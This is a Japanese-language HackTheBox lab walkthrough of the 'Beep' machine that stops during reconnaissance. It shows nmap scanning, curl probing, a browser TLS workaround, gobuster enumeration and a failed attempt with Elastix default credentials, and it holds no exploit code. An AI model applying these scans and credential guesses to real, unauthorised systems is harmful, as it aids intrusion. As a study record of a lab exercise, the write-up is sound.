HackTheBox: Beep (Machine Easy)

roaris commented 3 months ago

https://app.hackthebox.com/machines/Beep

$ nmap -sC -sV -Pn 10.10.10.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 14:35 JST
Nmap scan report for 10.10.10.7
Host is up (0.17s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open     smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open     http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open     pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: LOGIN-DELAY(0) PIPELINING APOP RESP-CODES UIDL EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE USER STLS TOP
111/tcp   open     rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            791/udp   status
|_  100024  1            794/tcp   status
143/tcp   open     imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: STARTTLS LISTEXT URLAUTHA0001 IMAP4 OK MULTIAPPEND IDLE NO X-NETSCAPE LIST-SUBSCRIBED ATOMIC CATENATE QUOTA NAMESPACE IMAP4rev1 LITERAL+ SORT=MODSEQ ANNOTATEMORE THREAD=REFERENCES UNSELECT THREAD=ORDEREDSUBJECT SORT ACL CHILDREN ID BINARY RIGHTS=kxte MAILBOX-REFERRALS CONDSTORE UIDPLUS RENAME Completed
443/tcp   open     ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-title: Elastix - Login page
|_ssl-date: 2024-05-03T05:35:02+00:00; -4m41s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
993/tcp   open     ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open     pop3       Cyrus pop3d
1039/tcp  filtered sbl
3306/tcp  open     mysql      MySQL (unauthorized)
4445/tcp  open     upnotifyp?
10000/tcp open     http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: -4m41s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 436.48 seconds

roaris commented 3 months ago

ポート80にアクセスすると、https:\//10.10.10.7にリダイレクトされて、この画面になる

ポート10000にアクセスしても、この画面になって、httpsのリンク踏むと、上と同じ画面

$ curl https://10.10.10.7 -v
*   Trying 10.10.10.7:443...
* Connected to 10.10.10.7 (10.10.10.7) port 443
* ALPN: curl offers h2,http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.0 (IN), TLS handshake, Certificate (11):
* TLSv1.0 (OUT), TLS alert, unknown CA (560):
* SSL certificate problem: self-signed certificate
* Closing connection
curl: (60) SSL certificate problem: self-signed certificate
More details here: https://curl.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

$ curl https://10.10.10.7:10000 -v
*   Trying 10.10.10.7:10000...
* Connected to 10.10.10.7 (10.10.10.7) port 10000
* ALPN: curl offers h2,http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.0 (IN), TLS handshake, Certificate (11):
* TLSv1.0 (OUT), TLS alert, unknown CA (560):
* SSL certificate problem: self-signed certificate
* Closing connection
curl: (60) SSL certificate problem: self-signed certificate
More details here: https://curl.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

自己署名証明書でも、Chromeでは警告が出るだけでアクセス出来るなんだけどなあ ERR_SSL_VERSION_OR_CIPHER_MISMATCH って出てくるのも変だし nmapの結果見ると、ポート443のところに

http-title: Elastix - Login page

とかあるけど

roaris commented 3 months ago

curlで-kオプションをつければ、証明書のエラーを無視出来るらしい https://tech.kurojica.com/archives/25380/

$ curl https://10.10.10.7 -k
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
        <title>Elastix - Login page</title>
...

$ curl https://10.10.10.7:10000 -k
<!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<link rel='stylesheet' type='text/css' href='/unauthenticated/style.css' />
<script type='text/javascript' src='/unauthenticated/toggleview.js'></script>
<script>
var rowsel = new Array();
</script>
<script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
<meta http-equiv="Content-Type" content="text/html; Charset=iso-8859-1">
<title></title>
<title>Login to Webmin</title></head>
...

じゃああとはブラウザの問題か

roaris commented 3 months ago

https://blog.kyanny.me/entry/2021/11/19/152927 の方法で、10.10.10.7の証明書をダウンロードして、Chromeに登録しようとしたが、登録出来ないエラーもなんも出てこないのでどうしようもない

roaris commented 3 months ago

自己署名証明書が問題なのではなく、TLSのバージョンが問題な気がしてきた ERR_SSL_VERSION_OR_CIPHER_MISMATCH って出てるし

roaris commented 3 months ago

https://forum.hackthebox.com/t/beep-broken-ssl/1190/12 この方法で出来た

Firefoxでアドレスバーにabout:configを打って、以下の設定をする

security.tls.version.enable-deprecated ---> true
security.tls.version.min --> 1

自己署名証明書で警告が出るけど、Accept the Risk and Continueを押せばOK

roaris commented 3 months ago

https:\//10.10.10.7はElastix、https:\//10.10.10.7:10000はWebminのログイン画面が出てくる SecListsの中には認証情報はなし

$ find /usr/share/SecLists -iname *elastix*
$ find /usr/share/SecLists -iname *webmin*

https://telephonesystemsservices.co.uk/what-are-the-default-elastix-passwords/ にElastixのデフォルトの認証情報がadmin / palosantoと書いてあるので、試したがログインできず Webminのデフォルトの認証情報は簡単に調べた感じ見つからなかったとりあえず、ユーザ名adminでSQLインジェクション試しといたけど、やはりログインできず

roaris commented 3 months ago

gobusterする curl同様、-kオプションをつけると、証明書のエラーを無視出来る相変わらず遅い(gobusterの問題ではないけど)

$ gobuster dir --url https://10.10.10.7 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.7
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/help                 (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/themes               (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/modules              (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/mail                 (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/static               (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/lang                 (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/var                  (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/panel                (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
Progress: 7014 / 87665 (8.00%)

ポート10000の方は、存在しないURLに対しても200を返すということで、エラーになっている

$ gobuster dir --url https://10.10.10.7:10000/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.7:10000/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

Error: the server returns a status code that matches the provided options for non existing urls. https://10.10.10.7:10000/f0e06973-d437-4f4c-818f-bbd351272776 => 200 (Length: 2375). To continue please exclude the status code or the length

とりあえずポート443で出てきている方を調べる

roaris commented 3 months ago

重要そうなのは/mail/と/admin/ /mail/はroundcubeのログイン画面が出てくる /admin/はBasic認証が求められて、失敗すると、FreePBXの画面が出てくる

SecListsの中にroundcubeのディレクトリ探索のファイルがあったんで、これでgobusterする

$ find /usr/share/SecLists -iname *round*
/usr/share/SecLists/Discovery/Web-Content/Roundcube-123.txt
$ head  /usr/share/SecLists/Discovery/Web-Content/Roundcube-123.txt
.htaccess
bin/cleandb.sh
bin/cssshrink.sh
bin/decrypt.sh
bin/deluser.sh
bin/dumpschema.sh
bin/gc.sh
bin/indexcontacts.sh
bin/initdb.sh
bin/installto.sh

$ gobuster dir --url https://10.10.10.7/mail/ --wordlist /usr/share/SecLists/Discovery/Web-Content/Roundcube-123.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.7/mail/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/Roundcube-123.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 292]
/bin/msgexport.sh     (Status: 200) [Size: 3980]
/bin/msgimport.sh     (Status: 200) [Size: 3269]
/bin/update.sh        (Status: 200) [Size: 4022]
/CHANGELOG            (Status: 200) [Size: 2926]
/config/.htaccess     (Status: 403) [Size: 299]
/config/config.inc.php.sample (Status: 403) [Size: 311]
/config/defaults.inc.php (Status: 403) [Size: 306]
/config/mimetypes.php (Status: 403) [Size: 303]
/INSTALL              (Status: 200) [Size: 7645]
/installer/check.php  (Status: 200) [Size: 116]
/installer/client.js  (Status: 200) [Size: 755]
/installer/images/add.png (Status: 200) [Size: 733]
/installer/config.php (Status: 200) [Size: 87]
/index.php            (Status: 200) [Size: 2411]
/installer/images/delete.png (Status: 200) [Size: 715]
/installer/images/error.png (Status: 200) [Size: 666]
/installer/index.php  (Status: 302) [Size: 0] [--> ./?_step=1]
/LICENSE              (Status: 200) [Size: 17987]
/installer/test.php   (Status: 200) [Size: 77]
/installer/styles.css (Status: 200) [Size: 3384]
/logs/.htaccess       (Status: 403) [Size: 297]
/plugins/additional_message_headers/additional_message_headers.php (Status: 200) [Size: 0]
/plugins/archive/archive.js (Status: 200) [Size: 1298]
/plugins/archive/archive.php (Status: 200) [Size: 0]
/plugins/archive/localization/cs_CZ.inc (Status: 200) [Size: 979]
/plugins/archive/localization/de_CH.inc (Status: 200) [Size: 175]
/plugins/archive/localization/de_DE.inc (Status: 200) [Size: 175]
/plugins/archive/localization/en_US.inc (Status: 200) [Size: 164]
/plugins/archive/localization/et_EE.inc (Status: 200) [Size: 163]
/plugins/archive/localization/fr_FR.inc (Status: 200) [Size: 170]
/plugins/archive/localization/pl_PL.inc (Status: 200) [Size: 170]
/plugins/archive/localization/ru_RU.inc (Status: 200) [Size: 215]
/plugins/autologon/autologon.php (Status: 200) [Size: 0]
/plugins/database_attachments/database_attachments.php (Status: 200) [Size: 0]
/plugins/debug_logger/debug_logger.php (Status: 200) [Size: 0]
/plugins/debug_logger/runlog/runlog.php (Status: 200) [Size: 0]
/plugins/emoticons/emoticons.php (Status: 200) [Size: 0]
/plugins/example_addressbook/example_addressbook.php (Status: 200) [Size: 0]
/plugins/example_addressbook/example_addressbook_backend.php (Status: 200) [Size: 0]
/plugins/filesystem_attachments/filesystem_attachments.php (Status: 200) [Size: 0]
/plugins/help/config.inc.php.dist (Status: 200) [Size: 2]
/plugins/help/content/license.html (Status: 200) [Size: 15997]
/plugins/help/help.php (Status: 200) [Size: 0]
/plugins/help/localization/cs_CZ.inc (Status: 200) [Size: 935]
/plugins/help/localization/en_GB.inc (Status: 200) [Size: 116]
/plugins/help/localization/en_US.inc (Status: 200) [Size: 116]
/plugins/help/localization/et_EE.inc (Status: 200) [Size: 125]
/plugins/help/localization/hu_HU.inc (Status: 200) [Size: 124]
/plugins/help/localization/pl_PL.inc (Status: 200) [Size: 124]
/plugins/help/localization/sv_SE.inc (Status: 200) [Size: 114]
/plugins/http_authentication/http_authentication.php (Status: 200) [Size: 0]
/plugins/managesieve/Changelog (Status: 200) [Size: 3289]
/plugins/managesieve/config.inc.php.dist (Status: 200) [Size: 0]
/plugins/managesieve/localization/bg_BG.inc (Status: 200) [Size: 3192]
/plugins/managesieve/localization/cs_CZ.inc (Status: 200) [Size: 2613]
/plugins/managesieve/localization/de_CH.inc (Status: 200) [Size: 2505]
/plugins/managesieve/localization/de_DE.inc (Status: 200) [Size: 2538]
/plugins/managesieve/localization/el_GR.inc (Status: 200) [Size: 3693]
/plugins/managesieve/localization/en_GB.inc (Status: 200) [Size: 2413]
/plugins/managesieve/localization/en_US.inc (Status: 200) [Size: 2413]
/plugins/managesieve/localization/es_ES.inc (Status: 200) [Size: 2669]
/plugins/managesieve/localization/et_EE.inc (Status: 200) [Size: 2419]
/plugins/managesieve/localization/fi_FI.inc (Status: 200) [Size: 2247]
/plugins/managesieve/localization/fr_FR.inc (Status: 200) [Size: 2710]
/plugins/managesieve/localization/hu_HU.inc (Status: 200) [Size: 2649]
/plugins/managesieve/localization/it_IT.inc (Status: 200) [Size: 2699]
/plugins/managesieve/localization/nl_NL.inc (Status: 200) [Size: 2287]
/plugins/managesieve/localization/pl_PL.inc (Status: 200) [Size: 2648]
/plugins/managesieve/localization/pt_BR.inc (Status: 200) [Size: 2611]
/plugins/managesieve/localization/ru_RU.inc (Status: 200) [Size: 3500]
/plugins/managesieve/localization/sl_SI.inc (Status: 200) [Size: 2625]
/plugins/managesieve/localization/sv_SE.inc (Status: 200) [Size: 2465]
/plugins/managesieve/localization/uk_UA.inc (Status: 200) [Size: 3366]
/plugins/managesieve/localization/zh_CN.inc (Status: 200) [Size: 2120]
/plugins/managesieve/managesieve.js (Status: 200) [Size: 11580]
/plugins/managesieve/managesieve.php (Status: 200) [Size: 0]
/plugins/markasjunk/localization/cs_CZ.inc (Status: 200) [Size: 949]
/plugins/markasjunk/localization/en_US.inc (Status: 200) [Size: 131]
/plugins/markasjunk/localization/et_EE.inc (Status: 200) [Size: 137]
/plugins/markasjunk/localization/pl_PL.inc (Status: 200) [Size: 137]
/plugins/markasjunk/localization/ru_RU.inc (Status: 200) [Size: 161]
/plugins/markasjunk/localization/sv_SE.inc (Status: 200) [Size: 143]
/plugins/markasjunk/markasjunk.js (Status: 200) [Size: 930]
/plugins/markasjunk/markasjunk.php (Status: 200) [Size: 0]
/plugins/new_user_dialog/localization/de_CH.inc (Status: 200) [Size: 210]
/plugins/new_user_dialog/localization/de_DE.inc (Status: 200) [Size: 210]
/plugins/new_user_dialog/localization/en_US.inc (Status: 200) [Size: 184]
/plugins/new_user_dialog/localization/et_EE.inc (Status: 200) [Size: 183]
/plugins/new_user_dialog/localization/pl_PL.inc (Status: 200) [Size: 186]
/plugins/new_user_dialog/localization/ru_RU.inc (Status: 200) [Size: 257]
/plugins/new_user_dialog/localization/sv_SE.inc (Status: 200) [Size: 227]
/plugins/new_user_dialog/new_user_dialog.php (Status: 200) [Size: 0]
/plugins/new_user_dialog/newuserdialog.css (Status: 200) [Size: 1093]
/plugins/new_user_identity/new_user_identity.php (Status: 200) [Size: 0]
/plugins/password/config.inc.php.dist (Status: 200) [Size: 0]
/plugins/password/drivers/cpanel.php (Status: 200) [Size: 0]
/plugins/password/drivers/directadmin.php (Status: 200) [Size: 0]
/plugins/password/drivers/ldap.php (Status: 200) [Size: 0]
/plugins/password/drivers/poppassd.php (Status: 200) [Size: 0]
/plugins/password/drivers/sasl.php (Status: 200) [Size: 0]
/plugins/password/drivers/sql.php (Status: 200) [Size: 0]
/plugins/password/drivers/vpopmaild.php (Status: 200) [Size: 0]
/plugins/password/drivers/ximss.php (Status: 200) [Size: 0]
/plugins/password/localization/bg_BG.inc (Status: 200) [Size: 962]
/plugins/password/localization/cs_CZ.inc (Status: 200) [Size: 902]
/plugins/password/localization/da_DK.inc (Status: 200) [Size: 794]
/plugins/password/localization/de_CH.inc (Status: 200) [Size: 803]
/plugins/password/localization/de_DE.inc (Status: 200) [Size: 803]
/plugins/password/localization/en_US.inc (Status: 200) [Size: 923]
/plugins/password/localization/et_EE.inc (Status: 200) [Size: 642]
/plugins/password/localization/fr_FR.inc (Status: 200) [Size: 894]
/plugins/password/localization/hu_HU.inc (Status: 200) [Size: 671]
/plugins/password/localization/it_IT.inc (Status: 200) [Size: 782]
/plugins/password/localization/nl_NL.inc (Status: 200) [Size: 683]
/plugins/password/localization/pl_PL.inc (Status: 200) [Size: 941]
/plugins/password/localization/pt_BR.inc (Status: 200) [Size: 759]
/plugins/password/localization/pt_PT.inc (Status: 200) [Size: 773]
/plugins/password/localization/sl_SI.inc (Status: 200) [Size: 761]
/plugins/password/localization/sv_SE.inc (Status: 200) [Size: 795]
/plugins/password/password.js (Status: 200) [Size: 1809]
/plugins/password/password.php (Status: 200) [Size: 0]
/plugins/password/README (Status: 200) [Size: 7014]
/plugins/show_additional_headers/show_additional_headers.php (Status: 200) [Size: 0]
/plugins/squirrelmail_usercopy/config.inc.php.dist (Status: 200) [Size: 0]
/plugins/squirrelmail_usercopy/squirrelmail_usercopy.php (Status: 200) [Size: 0]
/plugins/subscriptions_option/localization/cs_CZ.inc (Status: 200) [Size: 913]
/plugins/subscriptions_option/localization/de_CH.inc (Status: 200) [Size: 99]
/plugins/subscriptions_option/localization/de_DE.inc (Status: 200) [Size: 99]
/plugins/subscriptions_option/localization/en_US.inc (Status: 200) [Size: 91]
/plugins/subscriptions_option/localization/et_EE.inc (Status: 200) [Size: 90]
/plugins/subscriptions_option/localization/pl_PL.inc (Status: 200) [Size: 93]
/plugins/subscriptions_option/localization/ru_RU.inc (Status: 200) [Size: 115]
/plugins/subscriptions_option/localization/sv_SE.inc (Status: 200) [Size: 97]
/plugins/subscriptions_option/subscriptions_option.php (Status: 200) [Size: 0]
/plugins/userinfo/localization/cs_CZ.inc (Status: 200) [Size: 1045]
/plugins/userinfo/localization/de_CH.inc (Status: 200) [Size: 190]
/plugins/userinfo/localization/en_US.inc (Status: 200) [Size: 182]
/plugins/userinfo/localization/et_EE.inc (Status: 200) [Size: 191]
/plugins/userinfo/localization/pl_PL.inc (Status: 200) [Size: 200]
/plugins/userinfo/localization/pt_PT.inc (Status: 200) [Size: 210]
/plugins/userinfo/localization/sv_SE.inc (Status: 200) [Size: 188]
/plugins/userinfo/userinfo.js (Status: 200) [Size: 788]
/plugins/userinfo/userinfo.php (Status: 200) [Size: 0]
/plugins/vcard_attachments/localization/de_CH.inc (Status: 200) [Size: 164]
/plugins/vcard_attachments/localization/de_DE.inc (Status: 200) [Size: 164]
/plugins/vcard_attachments/localization/en_US.inc (Status: 200) [Size: 134]
/plugins/vcard_attachments/localization/ru_RU.inc (Status: 200) [Size: 170]
/plugins/vcard_attachments/vcard_attachments.php (Status: 200) [Size: 0]
/plugins/vcard_attachments/vcardattach.js (Status: 200) [Size: 245]
/program/include/rcmail.php (Status: 200) [Size: 0]
/program/include/iniset.php (Status: 200) [Size: 0]
/program/js/common.js (Status: 200) [Size: 11303]
/program/js/editor.js (Status: 200) [Size: 4620]
/program/js/googiespell.js (Status: 200) [Size: 21405]
/program/js/list.js   (Status: 200) [Size: 14001]
/program/js/app.js    (Status: 200) [Size: 89866]
/program/localization/ar_SA/labels.inc (Status: 200) [Size: 13102]
/program/localization/ar_SA/messages.inc (Status: 200) [Size: 7715]
/program/localization/ast/labels.inc (Status: 200) [Size: 12145]
/program/localization/ast/messages.inc (Status: 200) [Size: 7468]
/program/localization/az_AZ/labels.inc (Status: 200) [Size: 11631]
/program/localization/az_AZ/messages.inc (Status: 200) [Size: 6646]
/program/localization/bg_BG/labels.inc (Status: 200) [Size: 15024]
/program/localization/bg_BG/messages.inc (Status: 200) [Size: 9916]
/program/localization/bn_BD/labels.inc (Status: 200) [Size: 18562]
/program/localization/bn_BD/messages.inc (Status: 200) [Size: 10536]
/program/localization/br/labels.inc (Status: 200) [Size: 7654]
/program/localization/br/messages.inc (Status: 200) [Size: 5048]
/program/localization/bs_BA/labels.inc (Status: 200) [Size: 7736]
/program/localization/bs_BA/messages.inc (Status: 200) [Size: 4212]
/program/localization/ca_ES/labels.inc (Status: 200) [Size: 12226]
/program/localization/ca_ES/messages.inc (Status: 200) [Size: 7516]
/program/localization/cs_CZ/labels.inc (Status: 200) [Size: 12190]
/program/localization/cs_CZ/messages.inc (Status: 200) [Size: 7672]
/program/localization/cy_GB/labels.inc (Status: 200) [Size: 11978]
/program/localization/cy_GB/messages.inc (Status: 200) [Size: 7524]
/program/localization/da_DK/labels.inc (Status: 200) [Size: 11099]
/program/localization/da_DK/messages.inc (Status: 200) [Size: 6524]
/program/localization/de_CH/labels.inc (Status: 200) [Size: 12239]
/program/localization/de_CH/messages.inc (Status: 200) [Size: 7883]
/program/localization/de_DE/labels.inc (Status: 200) [Size: 12119]
/program/localization/de_DE/messages.inc (Status: 200) [Size: 7873]
/program/localization/el_GR/labels.inc (Status: 200) [Size: 13820]
/program/localization/el_GR/messages.inc (Status: 200) [Size: 7440]
/program/localization/en_GB/labels.inc (Status: 200) [Size: 10979]
/program/localization/en_GB/messages.inc (Status: 200) [Size: 6914]
/program/localization/en_US/labels.inc (Status: 200) [Size: 12012]
/program/localization/en_US/messages.inc (Status: 200) [Size: 7216]
/program/localization/eo/labels.inc (Status: 200) [Size: 9372]
/program/localization/eo/messages.inc (Status: 200) [Size: 5097]
/program/localization/es_AR/labels.inc (Status: 200) [Size: 12514]
/program/localization/es_AR/messages.inc (Status: 200) [Size: 7836]
/program/localization/es_ES/labels.inc (Status: 200) [Size: 12107]
/program/localization/es_ES/messages.inc (Status: 200) [Size: 7881]
/program/localization/et_EE/labels.inc (Status: 200) [Size: 11767]
/program/localization/et_EE/messages.inc (Status: 200) [Size: 7326]
/program/localization/eu_ES/labels.inc (Status: 200) [Size: 9869]
/program/localization/eu_ES/messages.inc (Status: 200) [Size: 5305]
/program/localization/fa_AF/labels.inc (Status: 200) [Size: 14692]
/program/localization/fa_AF/messages.inc (Status: 200) [Size: 8019]
/program/localization/fi_FI/labels.inc (Status: 200) [Size: 11751]
/program/localization/fi_FI/messages.inc (Status: 200) [Size: 6650]
/program/localization/fr_FR/labels.inc (Status: 200) [Size: 12313]
/program/localization/fr_FR/messages.inc (Status: 200) [Size: 7771]
/program/localization/ga_IE/labels.inc (Status: 200) [Size: 7697]
/program/localization/ga_IE/messages.inc (Status: 200) [Size: 5372]
/program/localization/gl_ES/labels.inc (Status: 200) [Size: 12192]
/program/localization/gl_ES/messages.inc (Status: 200) [Size: 7430]
/program/localization/he_IL/labels.inc (Status: 200) [Size: 13480]
/program/localization/he_IL/messages.inc (Status: 200) [Size: 8070]
/program/localization/hi_IN/labels.inc (Status: 200) [Size: 10595]
/program/localization/hi_IN/messages.inc (Status: 200) [Size: 6004]
/program/localization/hr_HR/labels.inc (Status: 200) [Size: 10796]
/program/localization/hr_HR/messages.inc (Status: 200) [Size: 6164]
/program/localization/hu_HU/labels.inc (Status: 200) [Size: 12881]
/program/localization/hu_HU/messages.inc (Status: 200) [Size: 7551]
/program/localization/hy_AM/labels.inc (Status: 200) [Size: 13933]
/program/localization/hy_AM/messages.inc (Status: 200) [Size: 7652]
/program/localization/id_ID/labels.inc (Status: 200) [Size: 11863]
/program/localization/id_ID/messages.inc (Status: 200) [Size: 6922]
/program/localization/index.inc (Status: 200) [Size: 4603]
/program/localization/is_IS/labels.inc (Status: 200) [Size: 11120]
/program/localization/is_IS/messages.inc (Status: 200) [Size: 3699]
/program/localization/it_IT/labels.inc (Status: 200) [Size: 12041]
/program/localization/it_IT/messages.inc (Status: 200) [Size: 7551]
/program/localization/ja_JP/labels.inc (Status: 200) [Size: 12494]
/program/localization/ja_JP/messages.inc (Status: 200) [Size: 8565]
/program/localization/ka_GE/labels.inc (Status: 200) [Size: 18962]
/program/localization/ka_GE/messages.inc (Status: 200) [Size: 12501]
/program/localization/ko_KR/labels.inc (Status: 200) [Size: 11637]
/program/localization/ko_KR/messages.inc (Status: 200) [Size: 6965]
/program/localization/ku/labels.inc (Status: 200) [Size: 8140]
/program/localization/ku/messages.inc (Status: 200) [Size: 5027]
/program/localization/lt_LT/labels.inc (Status: 200) [Size: 12247]
/program/localization/lt_LT/messages.inc (Status: 200) [Size: 7404]
/program/localization/lv_LV/labels.inc (Status: 200) [Size: 11775]
/program/localization/lv_LV/messages.inc (Status: 200) [Size: 6769]
/program/localization/mk_MK/labels.inc (Status: 200) [Size: 14445]
/program/localization/mk_MK/messages.inc (Status: 200) [Size: 8588]
/program/localization/mr_IN/labels.inc (Status: 200) [Size: 18090]
/program/localization/mr_IN/messages.inc (Status: 200) [Size: 11279]
/program/localization/ms_MY/labels.inc (Status: 200) [Size: 9071]
/program/localization/ms_MY/messages.inc (Status: 200) [Size: 5024]
/program/localization/nb_NO/labels.inc (Status: 200) [Size: 11365]
/program/localization/nb_NO/messages.inc (Status: 200) [Size: 7143]
/program/localization/ne_NP/labels.inc (Status: 200) [Size: 11183]
/program/localization/ne_NP/messages.inc (Status: 200) [Size: 7375]
/program/localization/nl_BE/labels.inc (Status: 200) [Size: 11385]
/program/localization/nl_BE/messages.inc (Status: 200) [Size: 5365]
/program/localization/nl_NL/labels.inc (Status: 200) [Size: 12247]
/program/localization/nl_NL/messages.inc (Status: 200) [Size: 7514]
/program/localization/nn_NO/labels.inc (Status: 200) [Size: 10245]
/program/localization/nn_NO/messages.inc (Status: 200) [Size: 5563]
/program/localization/pl_PL/labels.inc (Status: 200) [Size: 12405]
/program/localization/pl_PL/messages.inc (Status: 200) [Size: 7795]
/program/localization/ps/labels.inc (Status: 200) [Size: 13704]
/program/localization/ps/messages.inc (Status: 200) [Size: 7563]
/program/localization/pt_BR/labels.inc (Status: 200) [Size: 12437]
/program/localization/pt_BR/messages.inc (Status: 200) [Size: 7927]
/program/localization/pt_PT/labels.inc (Status: 200) [Size: 12112]
/program/localization/pt_PT/messages.inc (Status: 200) [Size: 7540]
/program/localization/ro_RO/labels.inc (Status: 200) [Size: 12302]
/program/localization/ro_RO/messages.inc (Status: 200) [Size: 7831]
/program/localization/ru_RU/labels.inc (Status: 200) [Size: 15162]
/program/localization/ru_RU/messages.inc (Status: 200) [Size: 9973]
/program/localization/si_LK/labels.inc (Status: 200) [Size: 11900]
/program/localization/si_LK/messages.inc (Status: 200) [Size: 8159]
/program/localization/sk_SK/labels.inc (Status: 200) [Size: 11138]
/program/localization/sk_SK/messages.inc (Status: 200) [Size: 6801]
/program/localization/sl_SI/labels.inc (Status: 200) [Size: 11901]
/program/localization/sl_SI/messages.inc (Status: 200) [Size: 7393]
/program/localization/sq_AL/labels.inc (Status: 200) [Size: 7997]
/program/localization/sq_AL/messages.inc (Status: 200) [Size: 5187]
/program/localization/sr_CS/labels.inc (Status: 200) [Size: 9909]
/program/localization/sr_CS/messages.inc (Status: 200) [Size: 6627]
/program/localization/sv_SE/labels.inc (Status: 200) [Size: 12076]
/program/localization/sv_SE/messages.inc (Status: 200) [Size: 7383]
/program/localization/th_TH/labels.inc (Status: 200) [Size: 9635]
/program/localization/th_TH/messages.inc (Status: 200) [Size: 6977]
/program/localization/tr_TR/labels.inc (Status: 200) [Size: 11949]
/program/localization/tr_TR/messages.inc (Status: 200) [Size: 7237]
/program/localization/uk_UA/labels.inc (Status: 200) [Size: 14500]
/program/localization/uk_UA/messages.inc (Status: 200) [Size: 8518]
/program/localization/vi_VN/labels.inc (Status: 200) [Size: 7185]
/program/localization/vi_VN/messages.inc (Status: 200) [Size: 3994]
/program/localization/zh_CN/labels.inc (Status: 200) [Size: 10761]
/program/localization/zh_CN/messages.inc (Status: 200) [Size: 5986]
/program/localization/zh_TW/labels.inc (Status: 200) [Size: 11401]
/program/localization/zh_TW/messages.inc (Status: 200) [Size: 6267]
/program/steps/addressbook/copy.inc (Status: 200) [Size: 2063]
/program/steps/addressbook/delete.inc (Status: 200) [Size: 2091]
/program/steps/addressbook/edit.inc (Status: 200) [Size: 3793]
/program/steps/addressbook/export.inc (Status: 200) [Size: 1615]
/program/steps/addressbook/func.inc (Status: 200) [Size: 6723]
/program/steps/addressbook/import.inc (Status: 200) [Size: 5860]
/program/steps/addressbook/list.inc (Status: 200) [Size: 1389]
